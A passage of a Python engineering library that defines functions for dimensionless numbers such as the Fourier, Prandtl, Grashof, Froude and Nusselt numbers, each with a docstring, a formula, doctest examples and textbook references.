Thermal diffusivity, [m^2/s]
Returns
-------
Fo : float
Fourier number (heat) []
Notes
-----
.. math::
Fo = \frac{\text{Heat conduction rate}}
{\text{Rate of thermal energy storage in a solid}}
An error is raised if none of the required input sets are provided.
Examples
--------
>>> Fourier_heat(t=1.5, L=2, rho=1000., Cp=4000., k=0.6)
5.625e-08
>>> Fourier_heat(1.5, 2, alpha=1E-7)
3.75e-08
References
----------
.. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
Eighth Edition. McGraw-Hill Professional, 2007.
.. [2] Cengel, Yunus, and John Cimbala. Fluid Mechanics: Fundamentals and
Applications. Boston: McGraw Hill Higher Education, 2006.
'''
if rho is not None and Cp is not None and k is not None:
alpha = k/(rho*Cp)
elif alpha is None:
raise ValueError('Either heat capacity and thermal conductivity and \
density, or thermal diffusivity is needed')
return t*alpha/(L*L)
def Fourier_mass(t, L, D):
r'''Calculates mass transfer Fourier number or `Fo` for a specified time
`t`, characteristic length `L`, and diffusion coefficient `D`.
.. math::
Fo = \frac{D t}{L^2}
Parameters
----------
t : float
time [s]
L : float
Characteristic length [m]
D : float
Diffusivity of a species, [m^2/s]
Returns
-------
Fo : float
Fourier number (mass) []
Notes
-----
.. math::
Fo = \frac{\text{Diffusive transport rate}}{\text{Storage rate}}
Examples
--------
>>> Fourier_mass(t=1.5, L=2, D=1E-9)
3.7500000000000005e-10
References
----------
.. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
Eighth Edition. McGraw-Hill Professional, 2007.
'''
return t*D/(L*L)
def Graetz_heat(V, D, x, rho=None, Cp=None, k=None, alpha=None):
r'''Calculates Graetz number or `Gz` for a specified velocity
`V`, diameter `D`, axial distance `x`, and specified properties for the
given fluid.
.. math::
Gz = \frac{VD^2\cdot C_p \rho}{x\cdot k} = \frac{VD^2}{x \alpha}
Inputs either of any of the following sets:
* V, D, x, density `rho`, heat capacity `Cp`, and thermal conductivity `k`
* V, D, x, and thermal diffusivity `alpha`
Parameters
----------
V : float
Velocity, [m/s]
D : float
Diameter [m]
x : float
Axial distance [m]
rho : float, optional
Density, [kg/m^3]
Cp : float, optional
Heat capacity, [J/kg/K]
k : float, optional
Thermal conductivity, [W/m/K]
alpha : float, optional
Thermal diffusivity, [m^2/s]
Returns
-------
Gz : float
Graetz number []
Notes
-----
.. math::
Gz = \frac{\text{Time for radial heat diffusion in a fluid by conduction}}
{\text{Time taken by fluid to reach distance x}}
.. math::
Gz = \frac{D}{x}RePr
An error is raised if none of the required input sets are provided.
Examples
--------
>>> Graetz_heat(1.5, 0.25, 5, 800., 2200., 0.6)
55000.0
>>> Graetz_heat(1.5, 0.25, 5, alpha=1E-7)
187500.0
References
----------
.. [1] Bergman, Theodore L., Adrienne S. Lavine, Frank P. Incropera, and
David P. DeWitt. Introduction to Heat Transfer. 6E. Hoboken, NJ:
Wiley, 2011.
'''
if rho is not None and Cp is not None and k is not None:
alpha = k/(rho*Cp)
elif alpha is None:
raise ValueError('Either heat capacity and thermal conductivity and\
density, or thermal diffusivity is needed')
return V*D*D/(x*alpha)
def Schmidt(D, mu=None, nu=None, rho=None):
r'''Calculates Schmidt number or `Sc` for a fluid with the given
parameters.
.. math::
Sc = \frac{\mu}{D\rho} = \frac{\nu}{D}
Inputs can be any of the following sets:
* Diffusivity, dynamic viscosity, and density
* Diffusivity and kinematic viscosity
Parameters
----------
D : float
Diffusivity of a species, [m^2/s]
mu : float, optional
Dynamic viscosity, [Pa*s]
nu : float, optional
Kinematic viscosity, [m^2/s]
rho : float, optional
Density, [kg/m^3]
Returns
-------
Sc : float
Schmidt number []
Notes
-----
.. math::
Sc =\frac{\text{kinematic viscosity}}{\text{molecular diffusivity}}
= \frac{\text{viscous diffusivity}}{\text{species diffusivity}}
An error is raised if none of the required input sets are provided.
Examples
--------
>>> Schmidt(D=2E-6, mu=4.61E-6, rho=800)
0.00288125
>>> Schmidt(D=1E-9, nu=6E-7)
599.9999999999999
References
----------
.. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
Eighth Edition. McGraw-Hill Professional, 2007.
.. [2] Cengel, Yunus, and John Cimbala. Fluid Mechanics: Fundamentals and
Applications. Boston: McGraw Hill Higher Education, 2006.
'''
if rho is not None and mu is not None:
return mu/(rho*D)
elif nu is not None:
return nu/D
else:
raise ValueError('Insufficient information provided for Schmidt number calculation')
def Lewis(D=None, alpha=None, Cp=None, k=None, rho=None):
r'''Calculates Lewis number or `Le` for a fluid with the given parameters.
.. math::
Le = \frac{k}{\rho C_p D} = \frac{\alpha}{D}
Inputs can be either of the following sets:
* Diffusivity and Thermal diffusivity
* Diffusivity, heat capacity, thermal conductivity, and density
Parameters
----------
D : float
Diffusivity of a species, [m^2/s]
alpha : float, optional
Thermal diffusivity, [m^2/s]
Cp : float, optional
Heat capacity, [J/kg/K]
k : float, optional
Thermal conductivity, [W/m/K]
rho : float, optional
Density, [kg/m^3]
Returns
-------
Le : float
Lewis number []
Notes
-----
.. math::
Le=\frac{\text{Thermal diffusivity}}{\text{Mass diffusivity}} =
\frac{Sc}{Pr}
An error is raised if none of the required input sets are provided.
Examples
--------
>>> Lewis(D=22.6E-6, alpha=19.1E-6)
0.8451327433628318
>>> Lewis(D=22.6E-6, rho=800., k=.2, Cp=2200)
0.00502815768302494
References
----------
.. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
Eighth Edition. McGraw-Hill Professional, 2007.
.. [2] Cengel, Yunus, and John Cimbala. Fluid Mechanics: Fundamentals and
Applications. Boston: McGraw Hill Higher Education, 2006.
.. [3] Gesellschaft, V. D. I., ed. VDI Heat Atlas. 2nd edition.
Berlin; New York:: Springer, 2010.
'''
if k is not None and Cp is not None and rho is not None:
alpha = k/(rho*Cp)
elif alpha is None:
raise ValueError('Insufficient information provided for Le calculation')
return alpha/D
def Weber(V, L, rho, sigma):
r'''Calculates Weber number, `We`, for a fluid with the given density,
surface tension, velocity, and geometric parameter (usually diameter
of bubble).
.. math::
We = \frac{V^2 L\rho}{\sigma}
Parameters
----------
V : float
Velocity of fluid, [m/s]
L : float
Characteristic length, typically bubble diameter [m]
rho : float
Density of fluid, [kg/m^3]
sigma : float
Surface tension, [N/m]
Returns
-------
We : float
Weber number []
Notes
-----
Used in bubble calculations.
.. math::
We = \frac{\text{inertial force}}{\text{surface tension force}}
Examples
--------
>>> Weber(V=0.18, L=0.001, rho=900., sigma=0.01)
2.916
References
----------
.. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
Eighth Edition. McGraw-Hill Professional, 2007.
.. [2] Cengel, Yunus, and John Cimbala. Fluid Mechanics: Fundamentals and
Applications. Boston: McGraw Hill Higher Education, 2006.
.. [3] Gesellschaft, V. D. I., ed. VDI Heat Atlas. 2nd edition.
Berlin; New York:: Springer, 2010.
'''
return V*V*L*rho/sigma
def Mach(V, c):
r'''Calculates Mach number or `Ma` for a fluid of velocity `V` with speed
of sound `c`.
.. math::
Ma = \frac{V}{c}
Parameters
----------
V : float
Velocity of fluid, [m/s]
c : float
Speed of sound in fluid, [m/s]
Returns
-------
Ma : float
Mach number []
Notes
-----
Used in compressible flow calculations.
.. math::
Ma = \frac{\text{fluid velocity}}{\text{sonic velocity}}
Examples
--------
>>> Mach(33., 330)
0.1
References
----------
.. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
Eighth Edition. McGraw-Hill Professional, 2007.
.. [2] Cengel, Yunus, and John Cimbala. Fluid Mechanics: Fundamentals and
Applications. Boston: McGraw Hill Higher Education, 2006.
'''
return V/c
def Confinement(D, rhol, rhog, sigma, g=g):
r'''Calculates Confinement number or `Co` for a fluid in a channel of
diameter `D` with liquid and gas densities `rhol` and `rhog` and surface
tension `sigma`, under the influence of gravitational force `g`.
.. math::
\text{Co}=\frac{\left[\frac{\sigma}{g(\rho_l-\rho_g)}\right]^{0.5}}{D}
Parameters
----------
D : float
Diameter of channel, [m]
rhol : float
Density of liquid phase, [kg/m^3]
rhog : float
Density of gas phase, [kg/m^3]
sigma : float
Surface tension between liquid-gas phase, [N/m]
g : float, optional
Acceleration due to gravity, [m/s^2]
Returns
-------
Co : float
Confinement number [-]
Notes
-----
Used in two-phase pressure drop and heat transfer correlations. First used
in [1]_ according to [3]_.
.. math::
\text{Co} = \frac{\frac{\text{surface tension force}}
{\text{buoyancy force}}}{\text{Channel area}}
Examples
--------
>>> Confinement(0.001, 1077, 76.5, 4.27E-3)
0.6596978265315191
References
----------
.. [1] Cornwell, Keith, and Peter A. Kew. "Boiling in Small Parallel
Channels." In Energy Efficiency in Process Technology, edited by Dr P.
A. Pilavachi, 624-638. Springer Netherlands, 1993.
doi:10.1007/978-94-011-1454-7_56.
.. [2] Kandlikar, Satish G. Heat Transfer and Fluid Flow in Minichannels
and Microchannels. Elsevier, 2006.
.. [3] Tran, T. N, M. -C Chyu, M. W Wambsganss, and D. M France. Two-Phase
Pressure Drop of Refrigerants during Flow Boiling in Small Channels: An
Experimental Investigation and Correlation Development." International
Journal of Multiphase Flow 26, no. 11 (November 1, 2000): 1739-54.
doi:10.1016/S0301-9322(99)00119-6.
'''
return sqrt(sigma/(g*(rhol-rhog)))/D
def Morton(rhol, rhog, mul, sigma, g=g):
r'''Calculates Morton number or `Mo` for a liquid and vapor with the
specified properties, under the influence of gravitational force `g`.
.. math::
Mo = \frac{g \mu_l^4(\rho_l - \rho_g)}{\rho_l^2 \sigma^3}
Parameters
----------
rhol : float
Density of liquid phase, [kg/m^3]
rhog : float
Density of gas phase, [kg/m^3]
mul : float
Viscosity of liquid phase, [Pa*s]
sigma : float
Surface tension between liquid-gas phase, [N/m]
g : float, optional
Acceleration due to gravity, [m/s^2]
Returns
-------
Mo : float
Morton number, [-]
Notes
-----
Used in modeling bubbles in liquid.
Examples
--------
>>> Morton(1077.0, 76.5, 4.27E-3, 0.023)
2.311183104430743e-07
References
----------
.. [1] Kunes, Josef. Dimensionless Physical Quantities in Science and
Engineering. Elsevier, 2012.
.. [2] Yan, Xiaokang, Kaixin Zheng, Yan Jia, Zhenyong Miao, Lijun Wang,
Yijun Cao, and Jiongtian Liu. “Drag Coefficient Prediction of a Single
Bubble Rising in Liquids.” Industrial & Engineering Chemistry Research,
April 2, 2018. https://doi.org/10.1021/acs.iecr.7b04743.
'''
mul2 = mul*mul
return g*mul2*mul2*(rhol - rhog)/(rhol*rhol*sigma*sigma*sigma)
def Knudsen(path, L):
r'''Calculates Knudsen number or `Kn` for a fluid with mean free path
`path` and for a characteristic length `L`.
.. math::
Kn = \frac{\lambda}{L}
Parameters
----------
path : float
Mean free path between molecular collisions, [m]
L : float
Characteristic length, [m]
Returns
-------
Kn : float
Knudsen number []
Notes
-----
Used in mass transfer calculations.
.. math::
Kn = \frac{\text{Mean free path length}}{\text{Characteristic length}}
Examples
--------
>>> Knudsen(1e-10, .001)
1e-07
References
----------
.. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
Eighth Edition. McGraw-Hill Professional, 2007.
.. [2] Cengel, Yunus, and John Cimbala. Fluid Mechanics: Fundamentals and
Applications. Boston: McGraw Hill Higher Education, 2006.
'''
return path/L
def Prandtl(Cp=None, k=None, mu=None, nu=None, rho=None, alpha=None):
r'''Calculates Prandtl number or `Pr` for a fluid with the given
parameters.
.. math::
Pr = \frac{C_p \mu}{k} = \frac{\nu}{\alpha} = \frac{C_p \rho \nu}{k}
Inputs can be any of the following sets:
* Heat capacity, dynamic viscosity, and thermal conductivity
* Thermal diffusivity and kinematic viscosity
* Heat capacity, kinematic viscosity, thermal conductivity, and density
Parameters
----------
Cp : float
Heat capacity, [J/kg/K]
k : float
Thermal conductivity, [W/m/K]
mu : float, optional
Dynamic viscosity, [Pa*s]
nu : float, optional
Kinematic viscosity, [m^2/s]
rho : float
Density, [kg/m^3]
alpha : float
Thermal diffusivity, [m^2/s]
Returns
-------
Pr : float
Prandtl number []
Notes
-----
.. math::
Pr=\frac{\text{kinematic viscosity}}{\text{thermal diffusivity}} = \frac{\text{momentum diffusivity}}{\text{thermal diffusivity}}
An error is raised if none of the required input sets are provided.
Examples
--------
>>> Prandtl(Cp=1637., k=0.010, mu=4.61E-6)
0.754657
>>> Prandtl(Cp=1637., k=0.010, nu=6.4E-7, rho=7.1)
0.7438528
>>> Prandtl(nu=6.3E-7, alpha=9E-7)
0.7000000000000001
References
----------
.. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
Eighth Edition. McGraw-Hill Professional, 2007.
.. [2] Cengel, Yunus, and John Cimbala. Fluid Mechanics: Fundamentals and
Applications. Boston: McGraw Hill Higher Education, 2006.
.. [3] Gesellschaft, V. D. I., ed. VDI Heat Atlas. 2nd edition.
Berlin; New York:: Springer, 2010.
'''
if k is not None and Cp is not None and mu is not None:
return Cp*mu/k
elif nu is not None and rho is not None and Cp is not None and k is not None:
return nu*rho*Cp/k
elif nu is not None and alpha is not None:
return nu/alpha
else:
raise ValueError('Insufficient information provided for Pr calculation')
def Grashof(L, beta, T1, T2=0, rho=None, mu=None, nu=None, g=g):
r'''Calculates Grashof number or `Gr` for a fluid with the given
properties, temperature difference, and characteristic length.
.. math::
Gr = \frac{g\beta (T_s-T_\infty)L^3}{\nu^2}
= \frac{g\beta (T_s-T_\infty)L^3\rho^2}{\mu^2}
Inputs either of any of the following sets:
* L, beta, T1 and T2, and density `rho` and kinematic viscosity `mu`
* L, beta, T1 and T2, and dynamic viscosity `nu`
Parameters
----------
L : float
Characteristic length [m]
beta : float
Volumetric thermal expansion coefficient [1/K]
T1 : float
Temperature 1, usually a film temperature [K]
T2 : float, optional
Temperature 2, usually a bulk temperature (or 0 if only a difference
is provided to the function) [K]
rho : float, optional
Density, [kg/m^3]
mu : float, optional
Dynamic viscosity, [Pa*s]
nu : float, optional
Kinematic viscosity, [m^2/s]
g : float, optional
Acceleration due to gravity, [m/s^2]
Returns
-------
Gr : float
Grashof number []
Notes
-----
.. math::
Gr = \frac{\text{Buoyancy forces}}{\text{Viscous forces}}
An error is raised if none of the required input sets are provided.
Used in free convection problems only.
Examples
--------
Example 4 of [1]_, p. 1-21 (matches):
>>> Grashof(L=0.9144, beta=0.000933, T1=178.2, rho=1.1613, mu=1.9E-5)
4656936556.178915
>>> Grashof(L=0.9144, beta=0.000933, T1=378.2, T2=200, nu=1.636e-05)
4657491516.530312
References
----------
.. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
Eighth Edition. McGraw-Hill Professional, 2007.
.. [2] Cengel, Yunus, and John Cimbala. Fluid Mechanics: Fundamentals and
Applications. Boston: McGraw Hill Higher Education, 2006.
'''
if rho is not None and mu is not None:
nu = mu/rho
elif nu is None:
raise ValueError('Either density and viscosity, or dynamic viscosity, \
is needed')
return g*beta*abs(T2-T1)*L*L*L/(nu*nu)
def Bond(rhol, rhog, sigma, L):
r'''Calculates Bond number, `Bo` also known as Eotvos number,
for a fluid with the given liquid and gas densities, surface tension,
and geometric parameter (usually length).
.. math::
Bo = \frac{g(\rho_l-\rho_g)L^2}{\sigma}
Parameters
----------
rhol : float
Density of liquid, [kg/m^3]
rhog : float
Density of gas, [kg/m^3]
sigma : float
Surface tension, [N/m]
L : float
Characteristic length, [m]
Returns
-------
Bo : float
Bond number []
Examples
--------
>>> Bond(1000., 1.2, .0589, 2)
665187.2339558573
References
----------
.. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
Eighth Edition. McGraw-Hill Professional, 2007.
'''
return (g*(rhol-rhog)*L*L/sigma)
Eotvos = Bond
def Rayleigh(Pr, Gr):
r'''Calculates Rayleigh number or `Ra` using Prandtl number `Pr` and
Grashof number `Gr` for a fluid with the given
properties, temperature difference, and characteristic length used
to calculate `Gr` and `Pr`.
.. math::
Ra = PrGr
Parameters
----------
Pr : float
Prandtl number []
Gr : float
Grashof number []
Returns
-------
Ra : float
Rayleigh number []
Notes
-----
Used in free convection problems only.
Examples
--------
>>> Rayleigh(1.2, 4.6E9)
5520000000.0
References
----------
.. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
Eighth Edition. McGraw-Hill Professional, 2007.
.. [2] Cengel, Yunus, and John Cimbala. Fluid Mechanics: Fundamentals and
Applications. Boston: McGraw Hill Higher Education, 2006.
'''
return Pr*Gr
def Froude(V, L, g=g, squared=False):
r'''Calculates Froude number `Fr` for velocity `V` and geometric length
`L`. If desired, gravity can be specified as well. Normally the function
returns the result of the equation below; Froude number is also often
said to be defined as the square of the equation below.
.. math::
Fr = \frac{V}{\sqrt{gL}}
Parameters
----------
V : float
Velocity of the particle or fluid, [m/s]
L : float
Characteristic length, no typical definition [m]
g : float, optional
Acceleration due to gravity, [m/s^2]
squared : bool, optional
Whether to return the squared form of Froude number
Returns
-------
Fr : float
Froude number, [-]
Notes
-----
Many alternate definitions including density ratios have been used.
.. math::
Fr = \frac{\text{Inertial Force}}{\text{Gravity Force}}
Examples
--------
>>> Froude(1.83, L=2., g=1.63)
1.0135432593877318
>>> Froude(1.83, L=2., squared=True)
0.17074638128208924
References
----------
.. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
Eighth Edition. McGraw-Hill Professional, 2007.
.. [2] Cengel, Yunus, and John Cimbala. Fluid Mechanics: Fundamentals and
Applications. Boston: McGraw Hill Higher Education, 2006.
'''
Fr = V/sqrt(L*g)
if squared:
Fr *= Fr
return Fr
def Froude_densimetric(V, L, rho1, rho2, heavy=True, g=g):
r'''Calculates the densimetric Froude number :math:`Fr_{den}` for velocity
`V` geometric length `L`, heavier fluid density `rho1`, and lighter fluid
density `rho2`. If desired, gravity can be specified as well. Depending on
the application, this dimensionless number may be defined with the heavy
phase or the light phase density in the numerator of the square root.
For some applications, both need to be calculated. The default is to
calculate with the heavy liquid ensity on top; set `heavy` to False
to reverse this.
.. math::
Fr = \frac{V}{\sqrt{gL}} \sqrt{\frac{\rho_\text{(1 or 2)}}
{\rho_1 - \rho_2}}
Parameters
----------
V : float
Velocity of the specified phase, [m/s]
L : float
Characteristic length, no typical definition [m]
rho1 : float
Density of the heavier phase, [kg/m^3]
rho2 : float
Density of the lighter phase, [kg/m^3]
heavy : bool, optional
Whether or not the density used in the numerator is the heavy phase or
the light phase, [-]
g : float, optional
Acceleration due to gravity, [m/s^2]
Returns
-------
Fr_den : float
Densimetric Froude number, [-]
Notes
-----
Many alternate definitions including density ratios have been used.
.. math::
Fr = \frac{\text{Inertial Force}}{\text{Gravity Force}}
Where the gravity force is reduced by the relative densities of one fluid
in another.
Note that an Exception will be raised if rho1 > rho2, as the square root
becomes negative.
Examples
--------
>>> Froude_densimetric(1.83, L=2., rho1=800, rho2=1.2, g=9.81)
0.4134543386272418
>>> Froude_densimetric(1.83, L=2., rho1=800, rho2=1.2, g=9.81, heavy=False)
0.016013017679205096
References
----------
.. [1] Hall, A, G Stobie, and R Steven. "Further Evaluation of the
Performance of Horizontally Installed Orifice Plate and Cone
Differential Pressure Meters with Wet Gas Flows." In International
SouthEast Asia Hydrocarbon Flow Measurement Workshop, KualaLumpur,
Malaysia, 2008.
'''
if heavy:
rho3 = rho1
else:
rho3 = rho2
return V/(sqrt(g*L))*sqrt(rho3/(rho1 - rho2))
def Strouhal(f, L, V):
r'''Calculates Strouhal number `St` for a characteristic frequency `f`,
characteristic length `L`, and velocity `V`.
.. math::
St = \frac{fL}{V}
Parameters
----------
f : float
Characteristic frequency, usually that of vortex shedding, [Hz]
L : float
Characteristic length, [m]
V : float
Velocity of the fluid, [m/s]
Returns
-------
St : float
Strouhal number, [-]
Notes
-----
Sometimes abbreviated to S or Sr.
.. math::
St = \frac{\text{Characteristic flow time}}
{\text{Period of oscillation}}
Examples
--------
>>> Strouhal(8, 2., 4.)
4.0
References
----------
.. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
Eighth Edition. McGraw-Hill Professional, 2007.
.. [2] Cengel, Yunus, and John Cimbala. Fluid Mechanics: Fundamentals and
Applications. Boston: McGraw Hill Higher Education, 2006.
'''
return f*L/V
def Nusselt(h, L, k):
r'''Calculates Nusselt number `Nu` for a heat transfer coefficient `h`,
characteristic length `L`, and thermal conductivity `k`.
.. math::
Nu = \frac{hL}{k}
Parameters
----------
h : float
Heat transfer coefficient, [W/m^2/K]
L : float
Characteristic length, no typical definition [m]
k : float
Thermal conductivity of fluid [W/m/K]
Returns
-------
Nu : float
Nusselt number, [-]
Notes
-----
Do not confuse k, the thermal conductivity of the fluid, with that
of within a solid object associated with!
.. math::
Nu = \frac{\text{Convective heat transfer}}
{\text{Conductive heat transfer}}
Examples
--------
>>> Nusselt(1000., 1.2, 300.)
4.0
>>> Nusselt(10000., .01, 4000.)
0.025
References
----------
.. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
Eighth Edition. McGraw-Hill Professional, 2007.
.. [2] Bergman, Theodore L., Adrienne S. Lavine, Frank P. Incropera, and
David P. DeWitt. Introduction to Heat Transfer. 6E. Hoboken, NJ:
Wiley, 2011.
'''
return h*L/k
def Sherwood(K, L, D):
r'''Calculates Sherwood number `Sh` for a mass transfer coefficient `K`,
characteristic length `L`, and diffusivity `D`.
.. math::
Sh = \frac{KL}{D}
Parameters
----------
K : float
Mass transfer coefficient, [m/s]
L : float
Characteristic length, no typical definition [m]
D : float
Diffusivity of a species [m/s^2]
Returns
-------
Sh : float
Sherwood number, [-]
Notes
-----
.. math::
Sh = \frac{\text{Mass transfer by convection}}
{\text{Mass transfer by diffusion}} = \frac{K}{D/L}
Examples
--------
>>> Sherwood(1000., 1.2, 300.)
4.0
References
----------
.. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
Eighth Edition. McGraw-Hill Professional, 2007.
'''
return K*L/D
def Biot(h, L, k):
r'''Calculates Biot number `Br` for heat transfer coefficient `h`,
geometric length `L`, and thermal conductivity `k`.
.. math::
Bi=\frac{hL}{k}
Parameters
----------
h : float
Heat transfer coefficient, [W/m^2/K]
L : float
Characteristic length, no typical definition [m]
k : float
Thermal conductivity, within the object [W/m/K]
Returns
-------
Bi : float
Biot number, [-]
Notes
-----
Do not confuse k, the thermal conductivity within the object, with that
of the medium h is calculated with!
.. math::
Bi = \frac{\text{Surface thermal resistance}}
{\text{Internal thermal resistance}}
Examples
--------
>>> Biot(1000., 1.2, 300.)
4.0
>>> Biot(10000., .01, 4000.)
0.025
References
----------
.. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
Eighth Edition. McGraw-Hill Professional, 2007.
.. [2] Cengel, Yunus, and John Cimbala. Fluid Mechanics: Fundamentals and
Applications. Boston: McGraw Hill Higher Education, 2006.
'''
return h*L/k
def Stanton(h, V, rho, Cp):
r'''Calculates Stanton number or `St` for a specified heat transfer
coefficient `h`, velocity `V`, density `rho`, and heat capacity `Cp` [1]_
[2]_.
.. math::
St = \frac{h}{V\rho Cp}
Parameters
----------
h : float
Heat transfer coefficient, [W/m^2/K]
V : float
Velocity, [m/s]
rho : float
Density, [kg/m^3]
Cp : float
Heat capacity, [J/kg/K]
Returns
-------
St : float
Stanton number []
Notes
-----
.. math::
St = \frac{\text{Heat transfer coefficient}}{\text{Thermal capacity}}
Examples
--------
>>> Stanton(5000, 5, 800, 2000.)
0.000625
References
----------
.. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
Eighth Edition. McGraw-Hill Professional, 2007.
.. [2] Bergman, Theodore L., Adrienne S. Lavine, Frank P. Incropera, and
David P. DeWitt. Introduction to Heat Transfer. 6E. Hoboken, NJ:
Wiley, 2011.
'''
return h/(V*rho*Cp)
def Euler(dP, rho, V):
r'''Calculates Euler number or `Eu` for a fluid of velocity `V` and
density `rho` experiencing a pressure drop `dP`.
.. math::
Eu = \frac{\Delta P}{\rho V^2}
Parameters
----------
dP : float
Pressure drop experience by the fluid, [Pa]
rho : float
Density of the fluid, [kg/m^3]
V : float
Velocity of fluid, [m/s]
Returns
-------
Eu : float
Euler number []
Notes
-----
Used in pressure drop calculations.
Rarely, this number is divided by two.
Named after Leonhard Euler applied calculus to fluid dynamics.
.. math::
Eu = \frac{\text{Pressure drop}}{2\cdot \text{velocity head}}
Examples
--------
>>> Euler(1E5, 1000., 4)
6.25
References
----------
.. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
Eighth Edition. McGraw-Hill Professional, 2007.
.. [2] Cengel, Yunus, and John Cimbala. Fluid Mechanics: Fundamentals and
Applications. Boston: McGraw Hill Higher Education, 2006.
'''
return dP/(rho*V*V)
def Cavitation(P, Psat, rho, V):
r'''Calculates Cavitation number or `Ca` for a fluid of velocity `V` with
a pressure `P`, vapor pressure `Psat`, and density `rho`.
.. math::
Ca = \sigma_c = \sigma = \frac{P-P_{sat}}{\frac{1}{2}\rho V^2}
Parameters
----------
P : float
Internal pressure of the fluid, [Pa]
Psat : float
Vapor pressure of the fluid, [Pa]
rho : float
Density of the fluid, [kg/m^3]
V : float
Velocity of fluid, [m/s]
Returns
-------
Ca : float
Cavitation number []
Notes
-----
Used in determining if a flow through a restriction will cavitate.
Sometimes, the multiplication by 2 will be omitted;
.. math::
Ca = \frac{\text{Pressure - Vapor pressure}}
{\text{Inertial pressure}}
Examples
--------
>>> Cavitation(2E5, 1E4, 1000, 10)
3.8
References
----------
.. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
Eighth Edition. McGraw-Hill Professional, 2007.
.. [2] Cengel, Yunus, and John Cimbala. Fluid Mechanics: Fundamentals and
Applications. Boston: McGraw Hill Higher Education, 2006.
'''
return (P-Psat)/(0.5*rho*V*V)
def Eckert(V, Cp, dT):
r'''Calculates Eckert number or `Ec` for a fluid of velocity `V` with
a heat capacity `Cp`, between two temperature given as `dT`.
.. math::
Ec = \frac{V^2}{C_p \Delta T}
Parameters
----------
V : float
Velocity of fluid, [m/s]
Cp : float
Heat capacity of the fluid, [J/kg/K]
dT : float
Temperature difference, [K]
Returns
-------
Ec : float
Eckert number []
Notes
-----
Used in certain heat transfer calculations. Fairly rare.
.. math::
Ec = \frac{\text{Kinetic energy} }{ \text{Enthalpy difference}}
Examples
--------
>>> Eckert(10, 2000., 25.)
0.002
References
----------
.. [1] Goldstein, Richard J. ECKERT NUMBER. Thermopedia. Hemisphere, 2011.
10.1615/AtoZ.e.eckert_number
'''
return V*V/(Cp*dT)
def Jakob(Cp, Hvap, Te):
r'''Calculates Jakob number or `Ja` for a boiling fluid with sensible heat
capacity `Cp`, enthalpy of vaporization `Hvap`, and boiling at `Te` degrees
above its saturation boiling point.
.. math::
Ja = \frac{C_{P}\Delta T_e}{\Delta H_{vap}}
Parameters
----------
Cp : float
Heat capacity of the fluid, [J/kg/K]
Hvap : float
Enthalpy of vaporization of the fluid at its saturation temperature [J/kg]
Te : float
Temperature difference above the fluid's saturation boiling temperature, [K]
Returns
-------
Ja : float
Jakob number []
Notes
-----
Used in boiling heat transfer analysis. Fairly rare.
.. math::
Ja = \frac{\Delta \text{Sensible heat}}{\Delta \text{Latent heat}}
Examples
--------
>>> Jakob(4000., 2E6, 10.)
0.02
References
----------
.. [1] Bergman, Theodore L., Adrienne S. Lavine, Frank P. Incropera, and
David P. DeWitt. Introduction to Heat Transfer. 6E. Hoboken, NJ:
Wiley, 2011.
.. [2] Cengel, Yunus, and John Cimbala. Fluid Mechanics: Fundamentals and
Applications. Boston: McGraw Hill Higher Education, 2006.
'''
return Cp*Te/Hvap
def Power_number(P, L, N, rho):
r'''Calculates power number, `Po`, for an agitator applying a specified
power `P` with a characteristic length `L`, rotational speed `N`, to
a fluid with a specified density `rho`.
.. math::
Po = \frac{P}{\rho N^3 D^5}
Parameters
----------
P : float
Power applied, [W]
L : float
Characteristic length, typically agitator diameter [m]
N : float
Speed [revolutions/second]
rho : float
Density of fluid, [kg/m^3]
Returns
-------
Po : float
Power number []
Notes
-----
Used in mixing calculations.
.. math::
Po = \frac{\text{Power}}{\text{Rotational inertia}}
Examples
--------
>>> Power_number(P=180, L=0.01, N=2.5, rho=800.)
144000000.0
References
----------
.. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
Eighth Edition. McGraw-Hill Professional, 2007.
.. [2] Cengel, Yunus, and John Cimbala. Fluid Mechanics: Fundamentals and
Applications. Boston: McGraw Hill Higher Education, 2006.
'''
return P/(rho*N*N*N*L**5)
def Drag(F, A, V, rho):
r'''Calculates drag coefficient `Cd` for a given drag force `F`,
projected area `A`, characteristic velocity `V`, and density `rho`.
.. math::
C_D = \frac{F_d}{A\cdot\frac{1}{2}\rho V^2}
Parameters
----------
F : float
Drag force, [N]
A : float
Projected area, [m^2]
V : float
Characteristic velocity, [m/s]
rho : float
Density, [kg/m^3]
Returns
-------
Cd : float
Drag coefficient, [-]
Notes
-----
Used in flow around objects, or objects flowing within a fluid.
.. math::
C_D = \frac{\text{Drag forces}}{\text{Projected area}\cdot
\text{Velocity head}}
Examples
--------
>>> Drag(1000, 0.0001, 5, 2000)
400.0
References
----------
.. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
Eighth Edition. McGraw-Hill Professional, 2007.
.. [2] Cengel, Yunus, and John Cimbala. Fluid Mechanics: Fundamentals and
Applications. Boston: McGraw Hill Higher Education, 2006.
'''
return F/(0.5*A*rho*V*V)
def Stokes_number(V, Dp, D, rhop, mu):
r'''Calculates Stokes Number for a given characteristic velocity `V`,
particle diameter `Dp`, characteristic diameter `D`, particle density
`rhop`, and fluid viscosity `mu`.
.. math::
\text{Stk} = \frac{\rho_p V D_p^2}{18\mu_f D}
Parameters
----------
V : float
Characteristic velocity (often superficial), [m/s]
Dp : float
Particle diameter, [m]
D : float
Characteristic diameter (ex demister wire diameter or cyclone
diameter), [m]
